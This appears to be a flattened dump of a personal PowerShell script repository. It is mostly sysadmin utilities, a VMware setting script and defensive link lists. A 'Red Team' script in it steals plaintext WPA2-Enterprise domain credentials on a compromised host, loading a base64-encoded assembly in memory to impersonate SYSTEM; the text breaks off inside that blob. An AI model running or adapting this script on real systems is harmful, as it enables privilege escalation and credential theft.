├── Am-I-Run-As-Admin.ps1 ├── Blue Team └── README.md ├── Convert-Temperature.ps1 ├── Documents ├── PowerShell Notes for Professionals.pdf └── README.md ├── Get-FolderHash.ps1 ├── Hardware └── README.md ├── Network └── README.md ├── Plan-Reboot-04.ps1 ├── PowerCLI ├── Enable-Copy-Paste-VM.ps1 └── README.md ├── README.md ├── Red Team ├── Get-WlanEnterprisePassword.ps1 └── README.md ├── Security ├── Check-Downgrade-Attacks.ps1 ├── Check-lower-PS-versions.ps1 ├── Convert-SID-To-Username.ps1 ├── Encrypt-String.ps1 ├── List-RDP-logins.ps1 └── README.md ├── SysAdmin ├── Check-Services.ps1 ├── Clean-Menu.ps1 ├── Connect-Shared-Folder.ps1 ├── Cool-Down-and-Sleep.ps1 ├── Download-File.ps1 ├── README.md ├── Run-Process.ps1 └── Uptime.ps1 ├── Test-PendingReboot.ps1 └── TimeTrack-Specific-Software-Openings.ps1 /Am-I-Run-As-Admin.ps1: -------------------------------------------------------------------------------- 1 | function CheckIfScriptIsRunAsAdmin { 2 | #You can use this also: #Requires -RunAsAdministrator 3 | 4 | If ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) -eq $false) { 5 | Write-Host "`n Woops! Please run me as admin." -Fore Yellow 6 | Write-Host " Left click on file and 'run as administrator'. :-)" -Fore Yellow 7 | break 8 | } 9 | } 10 | CheckIfScriptIsRunAsAdmin 11 | -------------------------------------------------------------------------------- /Blue Team/README.md: -------------------------------------------------------------------------------- 1 | # Blue Team - Defensieve 2 | - [PowerShell-Hunter](https://github.com/MHaggis/PowerShell-Hunter) - PowerShell tools to help defenders hunt smarter, hunt harder. 3 | 4 | ## Anti-virus and scanning for malicious files 5 | - [VirusTotal PowerShell Scanner.ps1](https://github.com/cottinghamd/PowershellAdmin/blob/master/VirusTotal%20PowerShell%20Scanner.ps1) - Some Powershell scripts developed during my security consulting work. Hopefully they are useful to you too! 6 | 7 | ## Decoding and deobfuscating 8 | - [PSDecode](https://github.com/R3MRUM/PSDecode) - PowerShell script for deobfuscating encoded PowerShell scripts. 9 | - [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework. 10 | - base64 11 | ````powershell 12 | #!/usr/local/bin/pwsh 13 | $Text = ‘Hemmelig tekst, woop woop’ 14 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 15 | $EncodedText =[Convert]::ToBase64String($Bytes) 16 | $EncodedText 17 | ```` 18 | 19 | ## Forensics 20 | - [Sparrow](https://github.com/cisagov/Sparrow) - Sparrow.ps1 was created by CISA's Cloud Forensics team to help detect possible compromised accounts and applications in the Azure/m365 environment. 21 | 22 | ## Incident Response 23 | - [Defensive Scripts by TrustedSec](https://github.com/trustedsec/defensive-scripts) - Collections of scripts created by the Trustedsec crew to aid defenders and Incident Response practitioners with theirs tasks. 24 | - [Fusion](https://github.com/awaescher/Fusion) - A modern alternative to the Microsoft Assembly Binding Log Viewer (FUSLOGVW.exe) 25 | - [Kansa](https://github.com/davehull/Kansa) - A Powershell incident response framework. 26 | - [PersistenceSniper](https://github.com/last-byte/PersistenceSniper) - Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. 27 | 28 | ## Monitoring 29 | - [EventList](https://www.powershellgallery.com/packages/EventList/2.0.0) - Install-Module -Name EventList 30 | - [DeepBlueCLI](https://github.com/sans-blue-team/DeepBlueCLI) - a PowerShell Module for Threat Hunting via Windows Event Logs - 31 | 32 | ## Presentations 33 | - [Blue Team Perspectives - The Business of Incident Response](https://digital-forensics.sans.org/summit-archives/Prague_Summit/Blue_Team_Perspectives_David_Kovar.pdf) 34 | -------------------------------------------------------------------------------- /Convert-Temperature.ps1: -------------------------------------------------------------------------------- 1 | #source: https://communary.net/2015/05/23/convert-temperature/ 2 | 3 | function Convert-Temperature { 4 | <# 5 | .SYNOPSIS 6 | Convert between different units of temperature. 7 | .DESCRIPTION 8 | This functions lets you convert between different units of temperature. You choose the 9 | unit you want to convert from, and the output will include an object with the value 10 | converted to all supported units. Supported units are 'Celsius', 'Fahrenheit', 'Kelvin', 11 | 'Rankine', 'Delisle', 'Newton', 'Réaumur' and 'Rømer'. 12 | .EXAMPLE 13 | Convert-Temperature -Value 35 -From Celsius 14 | .NOTES 15 | Author: Øyvind Kallstad 16 | Date: 10.05.2015 17 | Version: 1.0 18 | .LINK 19 | http://en.wikipedia.org/wiki/Conversion_of_units_of_temperature 20 | #> 21 | [CmdletBinding()] 22 | param ( 23 | # The value you want to convert. 24 | [Parameter(Position = 0, ValueFromPipeline)] 25 | [ValidateRange([double]::MinValue,[double]::MaxValue)] 26 | [double] $Value, 27 | 28 | # The unit you want to convert from. Available units are 'Celsius', 'Fahrenheit', 'Kelvin', 29 | # 'Rankine', 'Delisle', 'Newton', 'Réaumur' and 'Rømer'. 30 | [Parameter(Position = 1)] 31 | [ValidateSet('Celsius','Fahrenheit','Kelvin','Rankine','Delisle','Newton','Réaumur','Rømer')] 32 | [string] $From, 33 | 34 | # How many decimals you want to include in return values. 35 | [Parameter()] 36 | [ValidateRange(0,15)] 37 | [int] $Decimals = 2 38 | ) 39 | 40 | switch ($From) { 41 | 'Celsius' { 42 | Write-Output ([PSCustomObject] [Ordered] @{ 43 | Celsius = [math]::Round($Value, $Decimals) 44 | Fahrenheit = [math]::Round(($Value * (9/5) + 32), $Decimals) 45 | Kelvin = [math]::Round(($Value + 273.15), $Decimals) 46 | Rankine = [math]::Round((($Value + 273.15) * (9/5)), $Decimals) 47 | Delisle = [math]::Round(((100 – $Value) * (3/2)), $Decimals) 48 | Newton = [math]::Round(($Value * (33/100)), $Decimals) 49 | Réaumur = [math]::Round(($Value * (4/5)), $Decimals) 50 | Rømer = [math]::Round(($Value * (21/40) + 7.5), $Decimals) 51 | });break 52 | } 53 | 'Fahrenheit' { 54 | Write-Output ([PSCustomObject] [Ordered] @{ 55 | Celsius = [math]::Round((($Value – 32) * (5/9)), $Decimals) 56 | Fahrenheit = [math]::Round($Value, $Decimals) 57 | Kelvin = [math]::Round((($Value + 459.67) * (5/9)), $Decimals) 58 | Rankine = [math]::Round(($Value + 459.67), $Decimals) 59 | Delisle = [math]::Round(((212 – $Value) * (5/6)), $Decimals) 60 | Newton = [math]::Round((($Value – 32) * (11/60)), $Decimals) 61 | Réaumur = [math]::Round((($Value – 32) * (4/9)), $Decimals) 62 | Rømer = [math]::Round((($Value – 32) * (7/24) + 7.5), $Decimals) 63 | });break 64 | } 65 | 'Kelvin' { 66 | Write-Output ([PSCustomObject] [Ordered] @{ 67 | Celsius = [math]::Round(($Value – 273.15), $Decimals) 68 | Fahrenheit = [math]::Round(($Value * (9/5) – 459.67), $Decimals) 69 | Kelvin = [math]::Round($Value, $Decimals) 70 | Rankine = [math]::Round(($Value * (9/5)), $Decimals) 71 | Delisle = [math]::Round(((373.15 – $Value) * (3/2)), $Decimals) 72 | Newton = [math]::Round((($Value – 273.15) * (33/100)), $Decimals) 73 | Réaumur = [math]::Round((($Value – 273.15) * (4/5)), $Decimals) 74 | Rømer = [math]::Round((($Value – 273.15) * (21/40) + 7.5), $Decimals) 75 | });break 76 | } 77 | 'Rankine' { 78 | Write-Output ([PSCustomObject] [Ordered] @{ 79 | Celsius = [math]::Round((($Value – 491.67) * (5/9)), $Decimals) 80 | Fahrenheit = [math]::Round(($Value – 459.67), $Decimals) 81 | Kelvin = [math]::Round(($Value * (5/9)), $Decimals) 82 | Rankine = [math]::Round($Value, $Decimals) 83 | Delisle = [math]::Round(((671.67 – $Value) * (5/6)), $Decimals) 84 | Newton = [math]::Round((($Value – 491.67) * (11/60)), $Decimals) 85 | Réaumur = [math]::Round((($Value – 491.67) * (4/9)), $Decimals) 86 | Rømer = [math]::Round((($Value – 491.67) * (7/24) + 7.5), $Decimals) 87 | });break 88 | } 89 | 'Delisle' { 90 | Write-Output ([PSCustomObject] [Ordered] @{ 91 | Celsius = [math]::Round((100 – $Value * (2/3)), $Decimals) 92 | Fahrenheit = [math]::Round((212 – $Value * (6/5)), $Decimals) 93 | Kelvin = [math]::Round((373.15 – $Value * (2/3)), $Decimals) 94 | Rankine = [math]::Round((671.67 – $Value * (6/5)), $Decimals) 95 | Delisle = [math]::Round($Value, $Decimals) 96 | Newton = [math]::Round((33 – $Value * (11/50)), $Decimals) 97 | Réaumur = [math]::Round((80 – $Value * (8/15)), $Decimals) 98 | Rømer = [math]::Round((60 – $Value * (7/20)), $Decimals) 99 | });break 100 | } 101 | 'Newton' { 102 | Write-Output ([PSCustomObject] [Ordered] @{ 103 | Celsius = [math]::Round(($Value * (100/33)), $Decimals) 104 | Fahrenheit = [math]::Round(($Value * (60/11) + 32), $Decimals) 105 | Kelvin = [math]::Round(($Value * (100/33) + 273.15), $Decimals) 106 | Rankine = [math]::Round(($Value * (60/11) + 491.67), $Decimals) 107 | Delisle = [math]::Round(((33 – $Value) * (50/11)), $Decimals) 108 | Newton = [math]::Round($Value, $Decimals) 109 | Réaumur = [math]::Round(($Value * (80/33)), $Decimals) 110 | Rømer = [math]::Round(($Value * (35/22) + 7.5), $Decimals) 111 | });break 112 | } 113 | 'Réaumur' { 114 | Write-Output ([PSCustomObject] [Ordered] @{ 115 | Celsius = [math]::Round(($Value * (5/4)), $Decimals) 116 | Fahrenheit = [math]::Round(($Value * (9/4) + 32), $Decimals) 117 | Kelvin = [math]::Round(($Value * (5/4) + 273.15), $Decimals) 118 | Rankine = [math]::Round(($Value * (9/4) + 491.67), $Decimals) 119 | Delisle = [math]::Round(((80 – $Value) * (15/8)), $Decimals) 120 | Newton = [math]::Round(($Value * (33/80)), $Decimals) 121 | Réaumur = [math]::Round($Value, $Decimals) 122 | Rømer = [math]::Round(($Value * (21/32) + 7.5), $Decimals) 123 | });break 124 | } 125 | 'Rømer' { 126 | Write-Output ([PSCustomObject] [Ordered] @{ 127 | Celsius = [math]::Round((($Value – 7.5) * (40/21)), $Decimals) 128 | Fahrenheit = [math]::Round((($Value – 7.5) * (24/7) + 32), $Decimals) 129 | Kelvin = [math]::Round((($Value – 7.5) * (40/21) + 273.15), $Decimals) 130 | Rankine = [math]::Round((($Value – 7.5) * (24/7) + 491.67), $Decimals) 131 | Delisle = [math]::Round(((60 – $Value) * (20/7)), $Decimals) 132 | Newton = [math]::Round((($Value – 7.5) * (22/35)), $Decimals) 133 | Réaumur = [math]::Round((($Value – 7.5) * (32/21)), $Decimals) 134 | Rømer = [math]::Round($Value, $Decimals) 135 | });break 136 | } 137 | } 138 | } 139 | -------------------------------------------------------------------------------- /Documents/PowerShell Notes for Professionals.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Am0rphous/PowerShell/353397341be4771603ba41336f1c096b1b2d5d76/Documents/PowerShell Notes for Professionals.pdf -------------------------------------------------------------------------------- /Documents/README.md: -------------------------------------------------------------------------------- 1 | # Documents 2 | -------------------------------------------------------------------------------- /Get-FolderHash.ps1: -------------------------------------------------------------------------------- 1 | Function Get-FolderHash { 2 | param ($folder) 3 | 4 | Write-host "`nCalculating hash..." -Fore Yellow 5 | $files = dir $folder -Recurse | ? { -not $_.psiscontainer } 6 | 7 | $allBytes = new-object System.Collections.Generic.List[byte] 8 | foreach ($file in $files) { 9 | $allBytes.AddRange([System.IO.File]::ReadAllBytes($file.FullName)) 10 | $allBytes.AddRange([System.Text.Encoding]::UTF8.GetBytes($file.Name)) 11 | } 12 | $hasher = [System.Security.Cryptography.SHA256]::Create() 13 | $ret = [string]::Join("",$($hasher.ComputeHash($allBytes.ToArray()) | % {"{0:x2}" -f $_})) 14 | 15 | Write-Host "`nHash of '$folder' is " -Fore Yellow -NoNewline; Write-Host $ret -Fore Green 16 | } 17 | 18 | #Syntax: Get-FolderHash "C:\CustomFolder" 19 | -------------------------------------------------------------------------------- /Hardware/README.md: -------------------------------------------------------------------------------- 1 | # Hardware 2 | 3 | ## Memory 4 | - [Detailed Information about RAM in PowerShell](https://www.digitalbrekke.com/detailed-information-about-ram-in-powershell/) 5 | ````powershell 6 | Get-CimInstance -ClassName Win32_PhysicalMemory | Format-Table -Property Manufacturer, @{Name="Model";Expression={$_.PartNumber}}, @{Name="Size";Expression={[math]::round(($_.Capacity/1gb)).ToString()+" GB"}}, @{Name="Clock Speed";Expression={$_.ConfiguredClockSpeed}}, @{Name="RAM Slot";Expression={$_.DeviceLocator}} 7 | ```` 8 | 9 | ## Temperature 10 | - [PSTemperature](https://github.com/thedavecarroll/PSTemperature) - PowerShell binary module used for simple conversion of Celsius, Fahrenheit, Kelvin, and Rankine temperatures. 11 | 12 | ### GPU 13 | ````powershell 14 | wmic /namespace:\\root\cimv2 PATH Win32_PerfFormattedData_Counters_ThermalZoneInformation get Temperature 15 | ```` 16 | Convertion by using Convert-Temperature script in main folder 17 | ````powershell 18 | Convert-Temperature 303 -from Kelvin | ft 19 | ```` 20 | -------------------------------------------------------------------------------- /Network/README.md: -------------------------------------------------------------------------------- 1 | # Network 2 | 3 | 4 | ## Find best server based on latency 5 | ````powershell 6 | $servers = @( 7 | "us.api.security.microsoft.com", 8 | "eu.api.security.microsoft.com", 9 | "uk.api.security.microsoft.com", 10 | "au.api.security.microsoft.com", 11 | "swa.api.security.microsoft.com", 12 | "ina.api.security.microsoft.com" 13 | ) 14 | 15 | foreach ($server in $servers) { 16 | Write-Host "Pinging $server..." 17 | $pingResult = Test-Connection -ComputerName $server -Count 4 -ErrorAction SilentlyContinue 18 | if ($pingResult) { 19 | $avgResponseTime = ($pingResult | Measure-Object ResponseTime -Average).Average 20 | Write-Host "$server - Average Response Time: $avgResponseTime ms" 21 | } else { 22 | Write-Host "$server - Ping failed" 23 | } 24 | Write-Host "" 25 | } 26 | ```` 27 | Expected results: 28 | ```` 29 | Pinging us.api.security.microsoft.com... 30 | us.api.security.microsoft.com - Average Response Time: 106 ms 31 | 32 | Pinging eu.api.security.microsoft.com... 33 | eu.api.security.microsoft.com - Average Response Time: 24.75 ms 34 | 35 | Pinging uk.api.security.microsoft.com... 36 | uk.api.security.microsoft.com - Average Response Time: 31.75 ms 37 | 38 | Pinging au.api.security.microsoft.com... 39 | au.api.security.microsoft.com - Average Response Time: 255 ms 40 | 41 | Pinging swa.api.security.microsoft.com... 42 | swa.api.security.microsoft.com - Average Response Time: 28.25 ms 43 | 44 | Pinging ina.api.security.microsoft.com... 45 | ```` 46 | -------------------------------------------------------------------------------- /Plan-Reboot-04.ps1: -------------------------------------------------------------------------------- 1 | 2 | function ErDuHeltSikker? { 3 | do { 4 | [string]$script:valg = Read-Host "`tJ/N" 5 | if ($script:valg -eq "" -or 6 | $script:valg -ne "j" -and 7 | $script:valg -ne "n" 8 | ) { Write-Host "`n`tVennligst velg 'J' for ja eller 'N' for nei`n" -Fore Red } 9 | } while ($script:valg -ne "j" -and $valg -ne "n") 10 | } 11 | 12 | #Funksjon som viser tid etter utf�rte kommandoer 13 | $date = Get-Date -Format yyyy-MM-dd 14 | $time = get-date -Format HH:mm:ss 15 | $datetime = $date + " | " + $time 16 | 17 | $Skrivebordet = [Environment]::GetFolderPath("Desktop") 18 | $MappeSti = [Environment]::GetFolderPath("Desktop") + "\logger" 19 | $FilSti = $MappeSti + "\reboot-logg.txt" 20 | 21 | Clear-Host 22 | 23 | Write-Host "`n======== Planlegging av restart ========" -Fore Cyan 24 | 25 | do { 26 | [string] $navn = Read-Host "`n`tSkriv inn navnet ditt" 27 | if ($navn -eq "") { Write-Host "`n`tFeltet kan ikke v�re tomt" -Fore Red } 28 | } while ($navn -eq "") 29 | 30 | #Sjekker f�rst om loggen IKKE eksisterer 31 | If ((Test-Path $MappeSti) -eq $false) { 32 | 33 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 34 | Write-Host "Fant ikke logg-mappa p� skrivebordet. Pr�ver � opprette mappa.." -Fore Yellow 35 | 36 | New-Item -Path $Skrivebordet -Name "logger" -ItemType "directory" | Out-Null 37 | If ($?) { 38 | Write-Host "$datetime " -NoNewline -Fore Cyan 39 | Write-Host "Oppretta mappa suksessfullt!" -Fore Green 40 | } 41 | } 42 | 43 | If ((Test-Path $FilSti) -eq $false) { 44 | 45 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 46 | Write-Host "Fant ikke logg-fila. Pr�ver � opprette en.." -Fore Yellow 47 | 48 | $BegynnelsesTekst = $datetime + " Tidspunkt for opprettelse av loggfil. Utf�rt av '$navn'" 49 | 50 | New-Item -Path $MappeSti -Name "reboot-logg.txt" -ItemType "file" -Value $BegynnelsesTekst | Out-Null 51 | If ($?) { 52 | Write-Host "$datetime " -NoNewline -Fore Cyan 53 | Write-Host "Oppretta loggfil suksessfullt!" -Fore Green 54 | } 55 | } 56 | 57 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 58 | Write-Host "Du har planlagt å utføre en restart av denne serveren klokken 04:00 i morgen." -Fore Yellow 59 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 60 | Write-Host "Bekreft med j/J, eller avbryt med n/N.`n" -Fore Red 61 | ErDuHeltSikker? 62 | 63 | if ($script:valg -eq "j" -or $script:valg -eq "J") { 64 | $melding = "`n$datetime Planlegging av serverrestart klokken 04:00 i morgen, utført av '$navn'." 65 | Add-Content $FilSti $melding 66 | If ($?) { 67 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 68 | Write-Host "Logget planlagt restart av server til fila '$FilSti'" -Fore Green 69 | 70 | #Koden under henter antall sekunder fra nå, til klokken 04 i morgen. 71 | $AntallSekunder = ([decimal]::round(((Get-Date).AddDays(1).Date.AddHours(4) - (Get-Date)).TotalSeconds)) 72 | 73 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 74 | Write-Host "Begynner nedtelling for restart. Det er " -NoNewline -Fore Yellow 75 | Write-Host "$AntallSekunder" -NoNewline -Fore Red 76 | Write-Host " sekunder igjen til restart." -Fore Yellow 77 | 78 | Start-Sleep -Seconds $AntallSekunder 79 | 80 | $sisteMelding = "$datetime Utfører restart nå!" 81 | Add-Content $FilSti $sisteMelding 82 | 83 | Restart-Computer -Force 84 | } 85 | } Else { 86 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 87 | Write-Host "Avbryter" -Fore Green 88 | } 89 | -------------------------------------------------------------------------------- /PowerCLI/Enable-Copy-Paste-VM.ps1: -------------------------------------------------------------------------------- 1 | 2 | #https://kb.vmware.com/s/article/57122 3 | 4 | # Specify the vCenter server address and login credentials 5 | $vcServer = "server.example.com" 6 | #$username = "admin@vsphere.local" 7 | 8 | # Check if a session already exists for the vCenter server 9 | if (Get-PSSession | Where-Object { $_.ConfigurationName -eq 'VMware.VimAutomation.Core' -and $_.ComputerName -eq $vcServer }) { 10 | Write-Host "Using existing session for vCenter server '$vcServer'" 11 | } else { 12 | # Attempt to connect to the vCenter server 13 | try { 14 | Connect-VIServer -Server $vcServer -Credential(Get-Credential $username) -ErrorAction Stop 15 | Write-Host "Successfully connected to vCenter server '$vcServer'" 16 | } catch { 17 | Write-Error "Error: $($_.Exception.Message)" 18 | Write-Warning "Failed to connect to vCenter server '$vcServer'" 19 | Exit 20 | } 21 | } 22 | 23 | # Specify the name of the virtual machine 24 | do { 25 | $vmName = Read-Host "Enter the name of a virtual machine" 26 | $vm = Get-VM $vmName -ErrorAction SilentlyContinue 27 | if (!$vm) { 28 | Write-Warning "Virtual machine '$vmName' was not found. Did you mean some of these?" 29 | Get-VM | Where-Object {$_.Name -match $vmName} | Select-Object Name 30 | } 31 | } until ($vm) 32 | 33 | # Check if the virtual machine is powered on 34 | if ($vm.PowerState -eq "PoweredOn") { 35 | do { 36 | $answer = Read-Host "The virtual machine is powered on. Do you want to power it off? (yes/no)" 37 | $answer = $answer.ToLower() 38 | } until ($answer -eq "yes" -or $answer -eq "y" -or $answer -eq "no" -or $answer -eq "n") 39 | 40 | if ($answer -eq "yes" -or $answer -eq "y") { 41 | Write-Host "Shutting down the virtual machine gracefully..." 42 | Stop-VMGuest $vm -Confirm:$false 43 | do { 44 | Write-Host "Checking if the virtual machine is actually turned off..." 45 | Start-Sleep -Seconds 4 46 | } until ((Get-VM $vmName).PowerState -eq "PoweredOff") 47 | 48 | Write-Host "The virtual machine is now turned off." 49 | } else { 50 | Write-Host "The virtual machine will not be shut down. Fair enough.." 51 | } 52 | } else { 53 | Write-Host "The virtual machine is not powered on." 54 | } 55 | 56 | try { 57 | $vm = Get-VM $vmName 58 | New-AdvancedSetting -Entity $vm -Name isolation.tools.copy.disable -Value "FALSE" -Confirm:$false 59 | New-AdvancedSetting -Entity $vm -Name isolation.tools.paste.disable -Value "FALSE" -Confirm:$false 60 | New-AdvancedSetting -Entity $vm -Name isolation.tools.setGUIOptions.enable -Value "TRUE" -Confirm:$false 61 | Write-Host "Done!" -fore green 62 | } 63 | catch { 64 | Write-Error "Na.. something went wrong and here it is: $($_.Exception.Message)" 65 | } 66 | 67 | #Disconnect-VIServer $vcServer -Confirm:$false 68 | -------------------------------------------------------------------------------- /PowerCLI/README.md: -------------------------------------------------------------------------------- 1 | # PowerCLI 2 | 3 | ## Installing PowerShell – Homebrew 4 | ````powershell 5 | /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 6 | brew cask install powershell 7 | pwsh 8 | Install-Module -Name VMware.PowerCLI -Scope CurrentUser 9 | ```` 10 | 11 | ## Connecting to a VCenter Server 12 | - [Connect-VIServer](https://developer.vmware.com/docs/powercli/latest/vmware.vimautomation.core/commands/connect-viserver/#Default) 13 | ````powershell 14 | Connect-VIServer -Server vcenter.mydomain.com #option 1 15 | Connect-VIServer -Server IP-ADDRESS #option 2 16 | ```` 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Creativity is your weapon 2 | 3 | _PowerShell is a task automation and configuration management system developed by Microsoft. It is made up of a command language interpreter (shell) and scripting language built on the .NET Framework_ [TecMint](https://www.tecmint.com/install-powershell-in-linux/). 4 | 5 | - [PowerShell](https://github.com/PowerShell/PowerShell) - _"PowerShell for every system!"_ 6 | - [PowerShellGallery.com](https://www.powershellgallery.com) 7 | - [SyStandDeploy.com](http://www.systanddeploy.com) 8 | 9 | Because MacOS and Linux are non-Windows systems, PowerShell might lack some features on these OS'es. This is because .NET Core and PowerShell core isn't feature complete on other OS'es than Windows. 10 |
11 |
12 | #### When scripting - Keep this in mind 13 | - A script should be run without errors 14 | - It should perform the task for which it is intended 15 | - Program logic is clearly defined and apparent 16 | - A script does not do unnecessary work 17 | - Scripts should be reusable 18 | 19 | ## Collections 20 | - [PowerShell-Suite](https://github.com/FuzzySecurity/PowerShell-Suite) - tools and resources. 21 | - [Rvrsh3ll's Misc-PowerShell-Scripts](https://github.com/rvrsh3ll/Misc-Powershell-Scripts) - Random Tools. 22 | 23 | ## Network commands 24 | ````powershell 25 | Test-NetConnection -Computername $target -Port 5985 26 | ```` 27 | 28 | ### Other 29 | - [Nimx](https://github.com/yglukhov/nimx) - Cross-platform GUI framework in Nim. 30 | - [PowerRemoteDesktop](https://github.com/DarkCoderSc/PowerRemoteDesktop) - Remote Desktop entirely coded in PowerShell. 31 | - [Pwsh10k - Oh-my-posh theme](https://github.com/Kudostoy0u/pwsh10k) - Powerlevel10k based theme for Powershell. 32 | 33 | ## TimeTrack-Specific-Software-Openings.ps1 34 | Primitive script used to test how long time a specific program uses before it's opened. VLC and Windows Media Player is used as examples. Modern servers will have a close average time while old and unstable servers will have timing that varys more. Having stable and precises time is critical within streaming environments, where it's crucial a program opens without a delay. 35 | 36 | Picture that shows normal timing on modern hardware: 37 | Skjermbilde-2020-07-03-kl-17-07-23 38 | 39 | Timing that shows abnormal timing on slow and old hardware: 40 | Skjermbilde-2020-07-03-kl-17-09-25 41 | -------------------------------------------------------------------------------- /Red Team/Get-WlanEnterprisePassword.ps1: -------------------------------------------------------------------------------- 1 | #Source: https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html 2 | 3 | function Get-String 4 | { 5 | Param( 6 | [Parameter(Mandatory = $true, Position = 0)] 7 | [byte[]]$InputStream 8 | ) 9 | [byte[]]$Output = @(); 10 | foreach($byte in $InputStream) 11 | { 12 | if($byte -eq 0) 13 | { 14 | return $Output 15 | } else { 16 | $Output += $byte 17 | } 18 | 19 | } 20 | } 21 | 22 | function Get-System 23 | { 24 | if([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') 25 | { 26 | Write-Output "This powershell shell is not in STA mode!"; 27 | return ; 28 | } 29 | 30 | if(-not ([System.Management.Automation.PSTypeName]"zc00l.ImpersonationToken").Type) { 31 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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